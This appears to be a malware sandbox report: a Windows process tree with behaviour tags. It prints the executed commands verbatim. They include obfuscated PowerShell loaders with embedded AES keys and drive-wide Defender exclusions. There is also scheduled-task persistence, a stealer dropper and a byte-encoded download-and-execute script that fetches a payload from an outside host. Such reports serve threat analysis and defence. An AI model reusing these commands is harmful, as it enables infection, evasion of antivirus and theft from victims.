C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=16144 --field-trial-handle=2136,9955402495169958789,5981813490539589118,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:16⤵
- Uses browser remote debugging
- Suspicious behavior: EnumeratesProcesses
PID:6516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=16144 --field-trial-handle=2136,9955402495169958789,5981813490539589118,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4572 /prefetch:16⤵
- Uses browser remote debugging
- Suspicious behavior: EnumeratesProcesses
PID:5692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=16144 --field-trial-handle=2136,9955402495169958789,5981813490539589118,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3844 /prefetch:16⤵
- Uses browser remote debugging
- Suspicious behavior: EnumeratesProcesses
PID:5672
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C taskkill /F /IM firefox.exe5⤵PID:264
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1412
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C taskkill /F /IM Firefox.exe5⤵PID:4072
-
C:\Windows\system32\taskkill.exetaskkill /F /IM Firefox.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5756
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C taskkill /F /IM Firefox.exe5⤵PID:4140
-
C:\Windows\system32\taskkill.exetaskkill /F /IM Firefox.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6168
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C taskkill /F /IM firefox.exe5⤵PID:6472
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6928
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C taskkill /F /IM Firefox.exe5⤵PID:6216
-
C:\Windows\system32\taskkill.exetaskkill /F /IM Firefox.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7008
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C taskkill /F /IM Firefox.exe5⤵PID:7096
-
C:\Windows\system32\taskkill.exetaskkill /F /IM Firefox.exe6⤵
- Kills process with taskkill
PID:1880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 1 & Del "C:\Users\Admin\AppData\Local\Temp\1011339001\vvcWObH.exe"5⤵PID:4676
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 16⤵PID:5504
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd" "4⤵
- System Location Discovery: System Language Discovery
PID:3288 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd';$dDiO='LRynPoadRynP'.Replace('RynP', ''),'SpaoCflitaoCf'.Replace('aoCf', ''),'CpVXarepVXaapVXateDpVXaepVXacrpVXayppVXatpVXaorpVXa'.Replace('pVXa', ''),'ChsohbansohbgeEsohbxtsohbensohbssohbisohbosohbnsohb'.Replace('sohb', ''),'CopmwsyyTomwsy'.Replace('mwsy', ''),'RjwWteajwWtdLjwWtinjwWtesjwWt'.Replace('jwWt', ''),'FroxuoEmxuoEBasxuoEe6xuoE4StxuoErixuoEngxuoE'.Replace('xuoE', ''),'InwozUvowozUkwozUewozU'.Replace('wozU', ''),'GVJeMeVJeMtCVJeMurVJeMrVJeMentVJeMProVJeMceVJeMsVJeMsVJeM'.Replace('VJeM', ''),'ElkXvnemekXvnntkXvnAkXvntkXvn'.Replace('kXvn', ''),'EntMmVmryPMmVmoiMmVmntMmVm'.Replace('MmVm', ''),'TUudXranUudXsfUudXorUudXmFiUudXnaUudXlBlUudXocUudXkUudX'.Replace('UudX', ''),'MayhiDinMyhiDoyhiDduyhiDleyhiD'.Replace('yhiD', ''),'DejLwccojLwcmpjLwcresjLwcsjLwc'.Replace('jLwc', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($dDiO[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function yLwIh($TZhDQ){$YZolA=[System.Security.Cryptography.Aes]::Create();$YZolA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YZolA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YZolA.Key=[System.Convert]::($dDiO[6])('duQk/QtsCXjlfUWS6XCUuCu5I1g6+OrVeXJ2aigXvB8=');$YZolA.IV=[System.Convert]::($dDiO[6])('9XjdTIP29vRyU5L9wYwsyw==');$BZniG=$YZolA.($dDiO[2])();$mkKMG=$BZniG.($dDiO[11])($TZhDQ,0,$TZhDQ.Length);$BZniG.Dispose();$YZolA.Dispose();$mkKMG;}function XFQUx($TZhDQ){$WCDIU=New-Object System.IO.MemoryStream(,$TZhDQ);$NUdnb=New-Object System.IO.MemoryStream;$TtrMr=New-Object System.IO.Compression.GZipStream($WCDIU,[IO.Compression.CompressionMode]::($dDiO[13]));$TtrMr.($dDiO[4])($NUdnb);$TtrMr.Dispose();$WCDIU.Dispose();$NUdnb.Dispose();$NUdnb.ToArray();}$wHJim=[System.IO.File]::($dDiO[5])([Console]::Title);$kvBry=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 5).Substring(2))));$hsQZC=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 6).Substring(2))));[System.Reflection.Assembly]::($dDiO[0])([byte[]]$hsQZC).($dDiO[10]).($dDiO[7])($null,$null);[System.Reflection.Assembly]::($dDiO[0])([byte[]]$kvBry).($dDiO[10]).($dDiO[7])($null,$null); "5⤵
- System Location Discovery: System Language Discovery
PID:4648
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- System Location Discovery: System Language Discovery
PID:5696 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5924
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:2548
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\1011428021\withroot')6⤵
- System Location Discovery: System Language Discovery
PID:6052
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 25450' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network25450Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5848 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5848 -s 21567⤵
- Program crash
PID:6540
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network25450Man.cmd"6⤵
- System Location Discovery: System Language Discovery
PID:680 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network25450Man.cmd"7⤵
- System Location Discovery: System Language Discovery
PID:1644 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network25450Man.cmd';$dDiO='LRynPoadRynP'.Replace('RynP', ''),'SpaoCflitaoCf'.Replace('aoCf', ''),'CpVXarepVXaapVXateDpVXaepVXacrpVXayppVXatpVXaorpVXa'.Replace('pVXa', ''),'ChsohbansohbgeEsohbxtsohbensohbssohbisohbosohbnsohb'.Replace('sohb', ''),'CopmwsyyTomwsy'.Replace('mwsy', ''),'RjwWteajwWtdLjwWtinjwWtesjwWt'.Replace('jwWt', ''),'FroxuoEmxuoEBasxuoEe6xuoE4StxuoErixuoEngxuoE'.Replace('xuoE', ''),'InwozUvowozUkwozUewozU'.Replace('wozU', ''),'GVJeMeVJeMtCVJeMurVJeMrVJeMentVJeMProVJeMceVJeMsVJeMsVJeM'.Replace('VJeM', ''),'ElkXvnemekXvnntkXvnAkXvntkXvn'.Replace('kXvn', ''),'EntMmVmryPMmVmoiMmVmntMmVm'.Replace('MmVm', ''),'TUudXranUudXsfUudXorUudXmFiUudXnaUudXlBlUudXocUudXkUudX'.Replace('UudX', ''),'MayhiDinMyhiDoyhiDduyhiDleyhiD'.Replace('yhiD', ''),'DejLwccojLwcmpjLwcresjLwcsjLwc'.Replace('jLwc', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($dDiO[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function yLwIh($TZhDQ){$YZolA=[System.Security.Cryptography.Aes]::Create();$YZolA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YZolA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YZolA.Key=[System.Convert]::($dDiO[6])('duQk/QtsCXjlfUWS6XCUuCu5I1g6+OrVeXJ2aigXvB8=');$YZolA.IV=[System.Convert]::($dDiO[6])('9XjdTIP29vRyU5L9wYwsyw==');$BZniG=$YZolA.($dDiO[2])();$mkKMG=$BZniG.($dDiO[11])($TZhDQ,0,$TZhDQ.Length);$BZniG.Dispose();$YZolA.Dispose();$mkKMG;}function XFQUx($TZhDQ){$WCDIU=New-Object System.IO.MemoryStream(,$TZhDQ);$NUdnb=New-Object System.IO.MemoryStream;$TtrMr=New-Object System.IO.Compression.GZipStream($WCDIU,[IO.Compression.CompressionMode]::($dDiO[13]));$TtrMr.($dDiO[4])($NUdnb);$TtrMr.Dispose();$WCDIU.Dispose();$NUdnb.Dispose();$NUdnb.ToArray();}$wHJim=[System.IO.File]::($dDiO[5])([Console]::Title);$kvBry=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 5).Substring(2))));$hsQZC=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 6).Substring(2))));[System.Reflection.Assembly]::($dDiO[0])([byte[]]$hsQZC).($dDiO[10]).($dDiO[7])($null,$null);[System.Reflection.Assembly]::($dDiO[0])([byte[]]$kvBry).($dDiO[10]).($dDiO[7])($null,$null); "8⤵
- System Location Discovery: System Language Discovery
PID:460
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe8⤵
- System Location Discovery: System Language Discovery
PID:4388 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:4072
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5100
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network25450Man')9⤵
- System Location Discovery: System Language Discovery
PID:6728
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 25450' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network25450Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force9⤵
- Command and Scripting Interpreter: PowerShell
PID:5372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\10002870122\UpdatedAdmin.cmd" "9⤵PID:6240
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\10002870122\UpdatedAdmin.cmd';$nPrC='LoGoteadGote'.Replace('Gote', ''),'FITAkrITAkomBITAkaITAksITAke6ITAk4SITAktrITAkingITAk'.Replace('ITAk', ''),'EwCHintwCHirwCHiywCHiPwCHioiwCHintwCHi'.Replace('wCHi', ''),'SpePUtlitePUt'.Replace('ePUt', ''),'DecYisdompYisdrYisdeYisdsYisdsYisd'.Replace('Yisd', ''),'TsNkHrasNkHnssNkHfosNkHrsNkHmFsNkHinsNkHalsNkHBlosNkHcsNkHksNkH'.Replace('sNkH', ''),'CrfXbxeatfXbxeDfXbxecrfXbxypfXbxtfXbxorfXbx'.Replace('fXbx', ''),'MMLdxaMLdxinMLdxMoMLdxduMLdxleMLdx'.Replace('MLdx', ''),'ElIeKReIeKRmIeKReIeKRnIeKRtAIeKRtIeKR'.Replace('IeKR', ''),'InHUKcvHUKcokHUKceHUKc'.Replace('HUKc', ''),'ReazMwFdLzMwFizMwFneszMwF'.Replace('zMwF', ''),'ChaJonanaJongeEaJonxtaJonenaJonsaJoniaJonoaJonnaJon'.Replace('aJon', ''),'GepcketpckeCpckeurpckerepckentPpckerocpckeepckesspcke'.Replace('pcke', ''),'CQogZopQogZyTQogZoQogZ'.Replace('QogZ', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($nPrC[12])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kMdJS($RQSTg){$zmvMN=[System.Security.Cryptography.Aes]::Create();$zmvMN.Mode=[System.Security.Cryptography.CipherMode]::CBC;$zmvMN.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$zmvMN.Key=[System.Convert]::($nPrC[1])('ML5/q9cXAh8zwmdF4WccY8ENAkFEsjrEy+dUpWTmk7k=');$zmvMN.IV=[System.Convert]::($nPrC[1])('zFU4xrxhUym0St+7yBu7eA==');$pWysh=$zmvMN.($nPrC[6])();$OefOm=$pWysh.($nPrC[5])($RQSTg,0,$RQSTg.Length);$pWysh.Dispose();$zmvMN.Dispose();$OefOm;}function PFVVL($RQSTg){$eAKke=New-Object System.IO.MemoryStream(,$RQSTg);$LAgIa=New-Object System.IO.MemoryStream;$nDRnz=New-Object System.IO.Compression.GZipStream($eAKke,[IO.Compression.CompressionMode]::($nPrC[4]));$nDRnz.($nPrC[13])($LAgIa);$nDRnz.Dispose();$eAKke.Dispose();$LAgIa.Dispose();$LAgIa.ToArray();}$LXMkx=[System.IO.File]::($nPrC[10])([Console]::Title);$NXZhU=PFVVL (kMdJS ([Convert]::($nPrC[1])([System.Linq.Enumerable]::($nPrC[8])($LXMkx, 5).Substring(2))));$MPjpB=PFVVL (kMdJS ([Convert]::($nPrC[1])([System.Linq.Enumerable]::($nPrC[8])($LXMkx, 6).Substring(2))));[System.Reflection.Assembly]::($nPrC[0])([byte[]]$MPjpB).($nPrC[2]).($nPrC[9])($null,$null);[System.Reflection.Assembly]::($nPrC[0])([byte[]]$NXZhU).($nPrC[2]).($nPrC[9])($null,$null); "10⤵PID:5980
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10⤵PID:6824
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden11⤵
- Command and Scripting Interpreter: PowerShell
PID:5416
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')11⤵
- Command and Scripting Interpreter: PowerShell
PID:4664
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe"C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3236 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 5685⤵
- Program crash
PID:4180
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011459001\98b117a7c2.exe"C:\Users\Admin\AppData\Local\Temp\1011459001\98b117a7c2.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5004 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5532 -
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:6884
-
-
C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5792 -
C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5072 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5072 -s 12928⤵
- Program crash
PID:2308
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5072 -s 13168⤵
- Program crash
PID:840
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1002824001\8f3dd0e015.exe"C:\Users\Admin\AppData\Local\Temp\1002824001\8f3dd0e015.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6376 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 14887⤵
- Program crash
PID:316
-
-
-
C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5124 -
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6920
-
-
-
C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5044
-
-
C:\Users\Admin\AppData\Local\Temp\1004628001\ATLEQQXO.exe"C:\Users\Admin\AppData\Local\Temp\1004628001\ATLEQQXO.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4620 -
C:\Users\Admin\AppData\Local\Temp\pyexec.exe"C:\Users\Admin\AppData\Local\Temp\pyexec.exe"7⤵PID:5200
-
C:\Users\Admin\AppData\Roaming\UpdateChrome_Ze\pyexec.exeC:\Users\Admin\AppData\Roaming\UpdateChrome_Ze\pyexec.exe8⤵PID:6032
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe9⤵PID:6856
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 38410⤵
- Program crash
PID:772
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"6⤵PID:6840
-
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"7⤵PID:5912
-
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"8⤵PID:5580
-
-
C:\Users\Admin\10009130102\Properties.exe"C:\Users\Admin\10009130102\Properties.exe"8⤵PID:4488
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -NoProfile -NonInteractive -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & ([ScriptBlock]::Create([System.Text.Encoding]::Default.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,68,114,97,119,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,78,101,116,13,10,13,10,36,119,101,98,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,13,10,36,117,114,108,32,61,32,34,104,116,116,112,115,58,47,47,105,46,105,109,103,104,105,112,112,111,46,99,111,109,47,102,105,108,101,115,47,115,101,116,53,57,49,50,80,121,89,46,66,109,112,34,13,10,36,109,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,77,101,109,111,114,121,83,116,114,101,97,109,13,10,36,119,101,98,46,68,111,119,110,108,111,97,100,68,97,116,97,40,36,117,114,108,41,32,124,32,37,32,123,32,36,109,115,46,87,114,105,116,101,40,36,95,44,32,48,44,32,36,95,46,76,101,110,103,116,104,41,32,125,13,10,36,109,115,46,80,111,115,105,116,105,111,110,32,61,32,48,13,10,36,105,109,103,49,32,61,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,101,93,58,58,70,114,111,109,83,116,114,101,97,109,40,36,109,115,41,13,10,36,101,110,32,61,32,78,101,119,45,79,98,106,101,99,116,32,39,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,39,13,10,102,111,114,101,97,99,104,40,36,120,32,105,110,32,49,46,46,36,105,109,103,49,46,87,105,100,116,104,41,32,123,13,10,32,32,32,32,36,101,110,46,65,100,100,40,40,36,105,109,103,49,46,71,101,116,80,105,120,101,108,40,36,120,32,45,32,49,44,32,48,41,46,82,41,41,13,10,125,13,10,36,112,108,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,85,84,70,56,46,71,101,116,83,116,114,105,110,103,40,36,101,110,46,84,111,65,114,114,97,121,40,41,41,13,10,36,115,98,32,61,32,91,83,99,114,105,112,116,66,108,111,99,107,93,58,58,67,114,101,97,116,101,40,36,112,108,41,13,10,105,99,109,32,36,115,98,13,10,13,10,35,82,82,82,82)))); } c #d "9⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:6956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -NonInteractive -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & ([ScriptBlock]::Create([System.Text.Encoding]::Default.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,68,114,97,119,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,78,101,116,13,10,13,10,36,119,101,98,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,13,10,36,117,114,108,32,61,32,34,104,116,116,112,115,58,47,47,105,46,105,109,103,104,105,112,112,111,46,99,111,109,47,102,105,108,101,115,47,115,101,116,53,57,49,50,80,121,89,46,66,109,112,34,13,10,36,109,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,77,101,109,111,114,121,83,116,114,101,97,109,13,10,36,119,101,98,46,68,111,119,110,108,111,97,100,68,97,116,97,40,36,117,114,108,41,32,124,32,37,32,123,32,36,109,115,46,87,114,105,116,101,40,36,95,44,32,48,44,32,36,95,46,76,101,110,103,116,104,41,32,125,13,10,36,109,115,46,80,111,115,105,116,105,111,110,32,61,32,48,13,10,36,105,109,103,49,32,61,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,101,93,58,58,70,114,111,109,83,116,114,101,97,109,40,36,109,115,41,13,10,36,101,110,32,61,32,78,101,119,45,79,98,106,101,99,116,32,39,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,39,13,10,102,111,114,101,97,99,104,40,36,120,32,105,110,32,49,46,46,36,105,109,103,49,46,87,105,100,116,104,41,32,123,13,10,32,32,32,32,36,101,110,46,65,100,100,40,40,36,105,109,103,49,46,71,101,116,80,105,120,101,108,40,36,120,32,45,32,49,44,32,48,41,46,82,41,41,13,10,125,13,10,36,112,108,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,85,84,70,56,46,71,101,116,83,116,114,105,110,103,40,36,101,110,46,84,111,65,114,114,97,121,40,41,41,13,10,36,115,98,32,61,32,91,83,99,114,105,112,116,66,108,111,99,107,93,58,58,67,114,101,97,116,101,40,36,112,108,41,13,10,105,99,109,32,36,115,98,13,10,13,10,35,82,82,82,82)))); } c #d10⤵
- Command and Scripting Interpreter: PowerShell
PID:2424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\deleteSelf.bat" "9⤵PID:2628
-
-
-
C:\Users\Admin\10009150102\7749.exe"C:\Users\Admin\10009150102\7749.exe"8⤵PID:5388
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -NoProfile -NonInteractive -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & 